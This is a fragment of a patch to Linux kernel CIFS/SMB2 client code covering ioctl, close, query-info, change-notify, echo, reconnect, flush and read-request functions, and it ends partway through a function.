+-	if (*plen == 0)
+-		goto ioctl_exit; /* server returned no data */
+-	else if (*plen > rsp_iov.iov_len || *plen > 0xFF00) {
+-		cifs_tcon_dbg(VFS, "srv returned invalid ioctl length: %d\n", *plen);
+-		*plen = 0;
+-		rc = -EIO;
+-		goto ioctl_exit;
+-	}
+-
+-	if (rsp_iov.iov_len - *plen < le32_to_cpu(rsp->OutputOffset)) {
+-		cifs_tcon_dbg(VFS, "Malformed ioctl resp: len %d offset %d\n", *plen,
+-			le32_to_cpu(rsp->OutputOffset));
+-		*plen = 0;
+-		rc = -EIO;
+-		goto ioctl_exit;
+-	}
+-
+-	*out_data = kmemdup((char *)rsp + le32_to_cpu(rsp->OutputOffset),
+-			    *plen, GFP_KERNEL);
+-	if (*out_data == NULL) {
+-		rc = -ENOMEM;
+-		goto ioctl_exit;
+-	}
+-
+-ioctl_exit:
+-	SMB2_ioctl_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-/*
+- *   Individual callers to ioctl worker function follow
+- */
+-
+-int
+-SMB2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		     u64 persistent_fid, u64 volatile_fid)
+-{
+-	int rc;
+-	struct  compress_ioctl fsctl_input;
+-	char *ret_data = NULL;
+-
+-	fsctl_input.CompressionState =
+-			cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
+-
+-	rc = SMB2_ioctl(xid, tcon, persistent_fid, volatile_fid,
+-			FSCTL_SET_COMPRESSION,
+-			(char *)&fsctl_input /* data input */,
+-			2 /* in data len */, CIFSMaxBufSize /* max out data */,
+-			&ret_data /* out data */, NULL);
+-
+-	cifs_dbg(FYI, "set compression rc %d\n", rc);
+-
+-	return rc;
+-}
+-
+-int
+-SMB2_close_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		struct smb_rqst *rqst,
+-		u64 persistent_fid, u64 volatile_fid, bool query_attrs)
+-{
+-	struct smb2_close_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_CLOSE, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	if (query_attrs)
+-		req->Flags = SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB;
+-	else
+-		req->Flags = 0;
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	return 0;
+-}
+-
+-void
+-SMB2_close_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-int
+-__SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-	     u64 persistent_fid, u64 volatile_fid,
+-	     struct smb2_file_network_open_info *pbuf)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_close_rsp *rsp = NULL;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int rc = 0;
+-	int flags = 0;
+-	bool query_attrs = false;
+-
+-	cifs_dbg(FYI, "Close\n");
+-
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	/* check if need to ask server to return timestamps in close response */
+-	if (pbuf)
+-		query_attrs = true;
+-
+-	trace_smb3_close_enter(xid, persistent_fid, tcon->tid, ses->Suid);
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst, persistent_fid, volatile_fid,
+-			     query_attrs);
+-	if (rc)
+-		goto close_exit;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_close_rsp *)rsp_iov.iov_base;
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_CLOSE_HE);
+-		trace_smb3_close_err(xid, persistent_fid, tcon->tid, ses->Suid,
+-				     rc);
+-		goto close_exit;
+-	} else {
+-		trace_smb3_close_done(xid, persistent_fid, tcon->tid,
+-				      ses->Suid);
+-		/*
+-		 * Note that have to subtract 4 since struct network_open_info
+-		 * has a final 4 byte pad that close response does not have
+-		 */
+-		if (pbuf)
+-			memcpy(pbuf, (char *)&rsp->CreationTime, sizeof(*pbuf) - 4);
+-	}
+-
+-	atomic_dec(&tcon->num_remote_opens);
+-close_exit:
+-	SMB2_close_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-
+-	/* retry close in a worker thread if this one is interrupted */
+-	if (is_interrupt_error(rc)) {
+-		int tmp_rc;
+-
+-		tmp_rc = smb2_handle_cancelled_close(tcon, persistent_fid,
+-						     volatile_fid);
+-		if (tmp_rc)
+-			cifs_dbg(VFS, "handle cancelled close fid 0x%llx returned error %d\n",
+-				 persistent_fid, tmp_rc);
+-	}
+-	return rc;
+-}
+-
+-int
+-SMB2_close(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid)
+-{
+-	return __SMB2_close(xid, tcon, persistent_fid, volatile_fid, NULL);
+-}
+-
+-int
+-smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
+-		  struct kvec *iov, unsigned int min_buf_size)
+-{
+-	unsigned int smb_len = iov->iov_len;
+-	char *end_of_smb = smb_len + (char *)iov->iov_base;
+-	char *begin_of_buf = offset + (char *)iov->iov_base;
+-	char *end_of_buf = begin_of_buf + buffer_length;
+-
+-
+-	if (buffer_length < min_buf_size) {
+-		cifs_dbg(VFS, "buffer length %d smaller than minimum size %d\n",
+-			 buffer_length, min_buf_size);
+-		return -EINVAL;
+-	}
+-
+-	/* check if beyond RFC1001 maximum length */
+-	if ((smb_len > 0x7FFFFF) || (buffer_length > 0x7FFFFF)) {
+-		cifs_dbg(VFS, "buffer length %d or smb length %d too large\n",
+-			 buffer_length, smb_len);
+-		return -EINVAL;
+-	}
+-
+-	if ((begin_of_buf > end_of_smb) || (end_of_buf > end_of_smb)) {
+-		cifs_dbg(VFS, "Invalid server response, bad offset to data\n");
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-/*
+- * If SMB buffer fields are valid, copy into temporary buffer to hold result.
+- * Caller must free buffer.
+- */
+-int
+-smb2_validate_and_copy_iov(unsigned int offset, unsigned int buffer_length,
+-			   struct kvec *iov, unsigned int minbufsize,
+-			   char *data)
+-{
+-	char *begin_of_buf = offset + (char *)iov->iov_base;
+-	int rc;
+-
+-	if (!data)
+-		return -EINVAL;
+-
+-	rc = smb2_validate_iov(offset, buffer_length, iov, minbufsize);
+-	if (rc)
+-		return rc;
+-
+-	memcpy(data, begin_of_buf, minbufsize);
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		     struct smb_rqst *rqst,
+-		     u64 persistent_fid, u64 volatile_fid,
+-		     u8 info_class, u8 info_type, u32 additional_info,
+-		     size_t output_len, size_t input_len, void *input)
+-{
+-	struct smb2_query_info_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->InfoType = info_type;
+-	req->FileInfoClass = info_class;
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	req->AdditionalInformation = cpu_to_le32(additional_info);
+-
+-	req->OutputBufferLength = cpu_to_le32(output_len);
+-	if (input_len) {
+-		req->InputBufferLength = cpu_to_le32(input_len);
+-		/* total_len for smb query request never close to le16 max */
+-		req->InputBufferOffset = cpu_to_le16(total_len - 1);
+-		memcpy(req->Buffer, input, input_len);
+-	}
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1 + input_len;
+-	return 0;
+-}
+-
+-void
+-SMB2_query_info_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-static int
+-query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	   u64 persistent_fid, u64 volatile_fid, u8 info_class, u8 info_type,
+-	   u32 additional_info, size_t output_len, size_t min_len, void **data,
+-		u32 *dlen)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_query_info_rsp *rsp = NULL;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int rc = 0;
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server;
+-	int flags = 0;
+-	bool allocated = false;
+-
+-	cifs_dbg(FYI, "Query Info\n");
+-
+-	if (!ses)
+-		return -EIO;
+-	server = cifs_pick_channel(ses);
+-	if (!server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = SMB2_query_info_init(tcon, server,
+-				  &rqst, persistent_fid, volatile_fid,
+-				  info_class, info_type, additional_info,
+-				  output_len, 0, NULL);
+-	if (rc)
+-		goto qinf_exit;
+-
+-	trace_smb3_query_info_enter(xid, persistent_fid, tcon->tid,
+-				    ses->Suid, info_class, (__u32)info_type);
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+-		trace_smb3_query_info_err(xid, persistent_fid, tcon->tid,
+-				ses->Suid, info_class, (__u32)info_type, rc);
+-		goto qinf_exit;
+-	}
+-
+-	trace_smb3_query_info_done(xid, persistent_fid, tcon->tid,
+-				ses->Suid, info_class, (__u32)info_type);
+-
+-	if (dlen) {
+-		*dlen = le32_to_cpu(rsp->OutputBufferLength);
+-		if (!*data) {
+-			*data = kmalloc(*dlen, GFP_KERNEL);
+-			if (!*data) {
+-				cifs_tcon_dbg(VFS,
+-					"Error %d allocating memory for acl\n",
+-					rc);
+-				*dlen = 0;
+-				rc = -ENOMEM;
+-				goto qinf_exit;
+-			}
+-			allocated = true;
+-		}
+-	}
+-
+-	rc = smb2_validate_and_copy_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-					le32_to_cpu(rsp->OutputBufferLength),
+-					&rsp_iov, dlen ? *dlen : min_len, *data);
+-	if (rc && allocated) {
+-		kfree(*data);
+-		*data = NULL;
+-		*dlen = 0;
+-	}
+-
+-qinf_exit:
+-	SMB2_query_info_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
+-
+-int SMB2_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-	u64 persistent_fid, u64 volatile_fid, struct smb2_file_all_info *data)
+-{
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  FILE_ALL_INFORMATION, SMB2_O_INFO_FILE, 0,
+-			  sizeof(struct smb2_file_all_info) + PATH_MAX * 2,
+-			  sizeof(struct smb2_file_all_info), (void **)&data,
+-			  NULL);
+-}
+-
+-#if 0
+-/* currently unused, as now we are doing compounding instead (see smb311_posix_query_path_info) */
+-int
+-SMB311_posix_query_info(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid, struct smb311_posix_qinfo *data, u32 *plen)
+-{
+-	size_t output_len = sizeof(struct smb311_posix_qinfo *) +
+-			(sizeof(struct cifs_sid) * 2) + (PATH_MAX * 2);
+-	*plen = 0;
+-
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  SMB_FIND_FILE_POSIX_INFO, SMB2_O_INFO_FILE, 0,
+-			  output_len, sizeof(struct smb311_posix_qinfo), (void **)&data, plen);
+-	/* Note caller must free "data" (passed in above). It may be allocated in query_info call */
+-}
+-#endif
+-
+-int
+-SMB2_query_acl(const unsigned int xid, struct cifs_tcon *tcon,
+-	       u64 persistent_fid, u64 volatile_fid,
+-	       void **data, u32 *plen, u32 extra_info)
+-{
+-	__u32 additional_info = OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
+-				extra_info;
+-	*plen = 0;
+-
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  0, SMB2_O_INFO_SECURITY, additional_info,
+-			  SMB2_MAX_BUFFER_SIZE, MIN_SEC_DESC_LEN, data, plen);
+-}
+-
+-int
+-SMB2_get_srv_num(const unsigned int xid, struct cifs_tcon *tcon,
+-		 u64 persistent_fid, u64 volatile_fid, __le64 *uniqueid)
+-{
+-	return query_info(xid, tcon, persistent_fid, volatile_fid,
+-			  FILE_INTERNAL_INFORMATION, SMB2_O_INFO_FILE, 0,
+-			  sizeof(struct smb2_file_internal_info),
+-			  sizeof(struct smb2_file_internal_info),
+-			  (void **)&uniqueid, NULL);
+-}
+-
+-/*
+- * CHANGE_NOTIFY Request is sent to get notifications on changes to a directory
+- * See MS-SMB2 2.2.35 and 2.2.36
+- */
+-
+-static int
+-SMB2_notify_init(const unsigned int xid, struct smb_rqst *rqst,
+-		 struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		 u64 persistent_fid, u64 volatile_fid,
+-		 u32 completion_filter, bool watch_tree)
+-{
+-	struct smb2_change_notify_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_CHANGE_NOTIFY, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-	/* See note 354 of MS-SMB2, 64K max */
+-	req->OutputBufferLength =
+-		cpu_to_le32(SMB2_MAX_BUFFER_SIZE - MAX_SMB2_HDR_SIZE);
+-	req->CompletionFilter = cpu_to_le32(completion_filter);
+-	if (watch_tree)
+-		req->Flags = cpu_to_le16(SMB2_WATCH_TREE);
+-	else
+-		req->Flags = 0;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_change_notify(const unsigned int xid, struct cifs_tcon *tcon,
+-		u64 persistent_fid, u64 volatile_fid, bool watch_tree,
+-		u32 completion_filter, u32 max_out_data_len, char **out_data,
+-		u32 *plen /* returned data len */)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	struct smb_rqst rqst;
+-	struct smb2_change_notify_rsp *smb_rsp;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov = {NULL, 0};
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int flags = 0;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "change notify\n");
+-	if (!ses || !server)
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	if (plen)
+-		*plen = 0;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = SMB2_notify_init(xid, &rqst, tcon, server,
+-			      persistent_fid, volatile_fid,
+-			      completion_filter, watch_tree);
+-	if (rc)
+-		goto cnotify_exit;
+-
+-	trace_smb3_notify_enter(xid, persistent_fid, tcon->tid, ses->Suid,
+-				(u8)watch_tree, completion_filter);
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_CHANGE_NOTIFY_HE);
+-		trace_smb3_notify_err(xid, persistent_fid, tcon->tid, ses->Suid,
+-				(u8)watch_tree, completion_filter, rc);
+-	} else {
+-		trace_smb3_notify_done(xid, persistent_fid, tcon->tid,
+-			ses->Suid, (u8)watch_tree, completion_filter);
+-		/* validate that notify information is plausible */
+-		if ((rsp_iov.iov_base == NULL) ||
+-		    (rsp_iov.iov_len < sizeof(struct smb2_change_notify_rsp)))
+-			goto cnotify_exit;
+-
+-		smb_rsp = (struct smb2_change_notify_rsp *)rsp_iov.iov_base;
+-
+-		smb2_validate_iov(le16_to_cpu(smb_rsp->OutputBufferOffset),
+-				le32_to_cpu(smb_rsp->OutputBufferLength), &rsp_iov,
+-				sizeof(struct file_notify_information));
+-
+-		*out_data = kmemdup((char *)smb_rsp + le16_to_cpu(smb_rsp->OutputBufferOffset),
+-				le32_to_cpu(smb_rsp->OutputBufferLength), GFP_KERNEL);
+-		if (*out_data == NULL) {
+-			rc = -ENOMEM;
+-			goto cnotify_exit;
+-		} else
+-			*plen = le32_to_cpu(smb_rsp->OutputBufferLength);
+-	}
+-
+- cnotify_exit:
+-	if (rqst.rq_iov)
+-		cifs_small_buf_release(rqst.rq_iov[0].iov_base); /* request */
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-
+-
+-/*
+- * This is a no-op for now. We're not really interested in the reply, but
+- * rather in the fact that the server sent one and that server->lstrp
+- * gets updated.
+- *
+- * FIXME: maybe we should consider checking that the reply matches request?
+- */
+-static void
+-smb2_echo_callback(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->callback_data;
+-	struct smb2_echo_rsp *rsp = (struct smb2_echo_rsp *)mid->resp_buf;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-
+-	if (mid->mid_state == MID_RESPONSE_RECEIVED
+-	    || mid->mid_state == MID_RESPONSE_MALFORMED) {
+-		credits.value = le16_to_cpu(rsp->hdr.CreditRequest);
+-		credits.instance = server->reconnect_instance;
+-	}
+-
+-	release_mid(mid);
+-	add_credits(server, &credits, CIFS_ECHO_OP);
+-}
+-
+-void smb2_reconnect_server(struct work_struct *work)
+-{
+-	struct TCP_Server_Info *server = container_of(work,
+-					struct TCP_Server_Info, reconnect.work);
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses, *ses2;
+-	struct cifs_tcon *tcon, *tcon2;
+-	struct list_head tmp_list, tmp_ses_list;
+-	bool tcon_exist = false, ses_exist = false;
+-	bool tcon_selected = false;
+-	int rc;
+-	bool resched = false;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/* Prevent simultaneous reconnects that can corrupt tcon->rlist list */
+-	mutex_lock(&pserver->reconnect_mutex);
+-
+-	INIT_LIST_HEAD(&tmp_list);
+-	INIT_LIST_HEAD(&tmp_ses_list);
+-	cifs_dbg(FYI, "Reconnecting tcons and channels\n");
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-
+-		tcon_selected = false;
+-
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			if (tcon->need_reconnect || tcon->need_reopen_files) {
+-				tcon->tc_count++;
+-				list_add_tail(&tcon->rlist, &tmp_list);
+-				tcon_selected = tcon_exist = true;
+-			}
+-		}
+-		/*
+-		 * IPC has the same lifetime as its session and uses its
+-		 * refcount.
+-		 */
+-		if (ses->tcon_ipc && ses->tcon_ipc->need_reconnect) {
+-			list_add_tail(&ses->tcon_ipc->rlist, &tmp_list);
+-			tcon_selected = tcon_exist = true;
+-			ses->ses_count++;
+-		}
+-		/*
+-		 * handle the case where channel needs to reconnect
+-		 * binding session, but tcon is healthy (some other channel
+-		 * is active)
+-		 */
+-		spin_lock(&ses->chan_lock);
+-		if (!tcon_selected && cifs_chan_needs_reconnect(ses, server)) {
+-			list_add_tail(&ses->rlist, &tmp_ses_list);
+-			ses_exist = true;
+-			ses->ses_count++;
+-		}
+-		spin_unlock(&ses->chan_lock);
+-	}
+-	/*
+-	 * Get the reference to server struct to be sure that the last call of
+-	 * cifs_put_tcon() in the loop below won't release the server pointer.
+-	 */
+-	if (tcon_exist || ses_exist)
+-		server->srv_count++;
+-
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	list_for_each_entry_safe(tcon, tcon2, &tmp_list, rlist) {
+-		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
+-		if (!rc)
+-			cifs_reopen_persistent_handles(tcon);
+-		else
+-			resched = true;
+-		list_del_init(&tcon->rlist);
+-		if (tcon->ipc)
+-			cifs_put_smb_ses(tcon->ses);
+-		else
+-			cifs_put_tcon(tcon);
+-	}
+-
+-	if (!ses_exist)
+-		goto done;
+-
+-	/* allocate a dummy tcon struct used for reconnect */
+-	tcon = tconInfoAlloc();
+-	if (!tcon) {
+-		resched = true;
+-		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+-			list_del_init(&ses->rlist);
+-			cifs_put_smb_ses(ses);
+-		}
+-		goto done;
+-	}
+-
+-	tcon->status = TID_GOOD;
+-	tcon->retry = false;
+-	tcon->need_reconnect = false;
+-
+-	/* now reconnect sessions for necessary channels */
+-	list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+-		tcon->ses = ses;
+-		rc = smb2_reconnect(SMB2_INTERNAL_CMD, tcon, server);
+-		if (rc)
+-			resched = true;
+-		list_del_init(&ses->rlist);
+-		cifs_put_smb_ses(ses);
+-	}
+-	tconInfoFree(tcon);
+-
+-done:
+-	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
+-	if (resched)
+-		queue_delayed_work(cifsiod_wq, &server->reconnect, 2 * HZ);
+-	mutex_unlock(&pserver->reconnect_mutex);
+-
+-	/* now we can safely release srv struct */
+-	if (tcon_exist || ses_exist)
+-		cifs_put_tcp_session(server, 1);
+-}
+-
+-int
+-SMB2_echo(struct TCP_Server_Info *server)
+-{
+-	struct smb2_echo_req *req;
+-	int rc = 0;
+-	struct kvec iov[1];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 1 };
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "In echo request for conn_id %lld\n", server->conn_id);
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->ops->need_neg &&
+-	    server->ops->need_neg(server)) {
+-		spin_unlock(&server->srv_lock);
+-		/* No need to send echo on newly established connections */
+-		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-		return rc;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	rc = smb2_plain_req_init(SMB2_ECHO, NULL, server,
+-				 (void **)&req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->hdr.CreditRequest = cpu_to_le16(1);
+-
+-	iov[0].iov_len = total_len;
+-	iov[0].iov_base = (char *)req;
+-
+-	rc = cifs_call_async(server, &rqst, NULL, smb2_echo_callback, NULL,
+-			     server, CIFS_ECHO_OP, NULL);
+-	if (rc)
+-		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
+-
+-	cifs_small_buf_release(req);
+-	return rc;
+-}
+-
+-void
+-SMB2_flush_free(struct smb_rqst *rqst)
+-{
+-	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
+-}
+-
+-int
+-SMB2_flush_init(const unsigned int xid, struct smb_rqst *rqst,
+-		struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+-		u64 persistent_fid, u64 volatile_fid)
+-{
+-	struct smb2_flush_req *req;
+-	struct kvec *iov = rqst->rq_iov;
+-	unsigned int total_len;
+-	int rc;
+-
+-	rc = smb2_plain_req_init(SMB2_FLUSH, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->PersistentFileId = persistent_fid;
+-	req->VolatileFileId = volatile_fid;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+-	   u64 volatile_fid)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct smb_rqst rqst;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov = {NULL, 0};
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int resp_buftype = CIFS_NO_BUFFER;
+-	int flags = 0;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "flush\n");
+-	if (!ses || !(ses->server))
+-		return -EIO;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = SMB2_flush_init(xid, &rqst, tcon, server,
+-			     persistent_fid, volatile_fid);
+-	if (rc)
+-		goto flush_exit;
+-
+-	trace_smb3_flush_enter(xid, persistent_fid, tcon->tid, ses->Suid);
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-
+-	if (rc != 0) {
+-		cifs_stats_fail_inc(tcon, SMB2_FLUSH_HE);
+-		trace_smb3_flush_err(xid, persistent_fid, tcon->tid, ses->Suid,
+-				     rc);
+-	} else
+-		trace_smb3_flush_done(xid, persistent_fid, tcon->tid,
+-				      ses->Suid);
+-
+- flush_exit:
+-	SMB2_flush_free(&rqst);
+-	free_rsp_buf(resp_buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
+-{
+-	struct TCP_Server_Info *server = io_parms->server;
+-	struct cifs_tcon *tcon = io_parms->tcon;
+-
+-	/* we can only offload if we're connected */
+-	if (!server || !tcon)
+-		return false;
+-
+-	/* we can only offload on an rdma connection */
+-	if (!server->rdma || !server->smbd_conn)
+-		return false;
+-
+-	/* we don't support signed offload yet */
+-	if (server->sign)
+-		return false;
+-
+-	/* we don't support encrypted offload yet */
+-	if (smb3_encryption_required(tcon))
+-		return false;
+-
+-	/* offload also has its overhead, so only do it if desired */
+-	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
+-		return false;
+-
+-	return true;
+-}
+-#endif /* CONFIG_CIFS_SMB_DIRECT */
+-
+-/*
+- * To form a chain of read requests, any read requests after the first should
+- * have the end_of_chain boolean set to true.
+- */
+-static int
+-smb2_new_read_req(void **buf, unsigned int *total_len,
+-	struct cifs_io_parms *io_parms, struct cifs_readdata *rdata,
+-	unsigned int remaining_bytes, int request_type)
+-{
+-	int rc = -EACCES;
+-	struct smb2_read_req *req = NULL;
+-	struct smb2_hdr *shdr;
+-	struct TCP_Server_Info *server = io_parms->server;
+-
+-	rc = smb2_plain_req_init(SMB2_READ, io_parms->tcon, server,
+-				 (void **) &req, total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (server == NULL)
+-		return -ECONNABORTED;
+-
+-	shdr = &req->hdr;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+-
+-	req->PersistentFileId = io_parms->persistent_fid;
+-	req->VolatileFileId = io_parms->volatile_fid;
+-	req->ReadChannelInfoOffset = 0; /* reserved */
+-	req->ReadChannelInfoLength = 0; /* reserved */
+-	req->Channel = 0; /* reserved */
+-	req->MinimumCount = 0;
+-	req->Length = cpu_to_le32(io_parms->length);
+-	req->Offset = cpu_to_le64(io_parms->offset);
+-
+-	trace_smb3_read_enter(0 /* xid */,
+-			io_parms->persistent_fid,
+-			io_parms->tcon->tid, io_parms->tcon->ses->Suid,
+-			io_parms->offset, io_parms->length);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	/*
+-	 * If we want to do a RDMA write, fill in and append
+-	 * smbd_buffer_descriptor_v1 to the end of read request
+-	 */
+-	if (smb3_use_rdma_offload(io_parms)) {
+-		struct smbd_buffer_descriptor_v1 *v1;
+-		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+-
+-		rdata->mr = smbd_register_mr(
+-				server->smbd_conn, rdata->pages,
+-				rdata->nr_pages, rdata->page_offset,
+-				rdata->tailsz, true, need_invalidate);
+-		if (!rdata->mr)
+-			return -EAGAIN;
+-
+-		req->Channel = SMB2_CHANNEL_RDMA_V1_INVALIDATE;
+-		if (need_invalidate)
+-			req->Channel = SMB2_CHANNEL_RDMA_V1;
+-		req->ReadChannelInfoOffset =
+-			cpu_to_le16(offsetof(struct smb2_read_req, Buffer));
+-		req->ReadChannelInfoLength =
+-			cpu_to_le16(sizeof(struct smbd_buffer_descriptor_v1));
+-		v1 = (struct smbd_buffer_descriptor_v1 *) &req->Buffer[0];
+-		v1->offset = cpu_to_le64(rdata->mr->mr->iova);
+-		v1->token = cpu_to_le32(rdata->mr->mr->rkey);
+-		v1->length = cpu_to_le32(rdata->mr->mr->length);
+-
+-		*total_len += sizeof(*v1) - 1;
+-	}
+-#endif
+-	if (request_type & CHAINED_REQUEST) {
+-		if (!(request_type & END_OF_CHAIN)) {
+-			/* next 8-byte aligned request */
+-			*total_len = ALIGN(*total_len, 8);
+-			shdr->NextCommand = cpu_to_le32(*total_len);
+-		} else /* END_OF_CHAIN */
+-			shdr->NextCommand = 0;
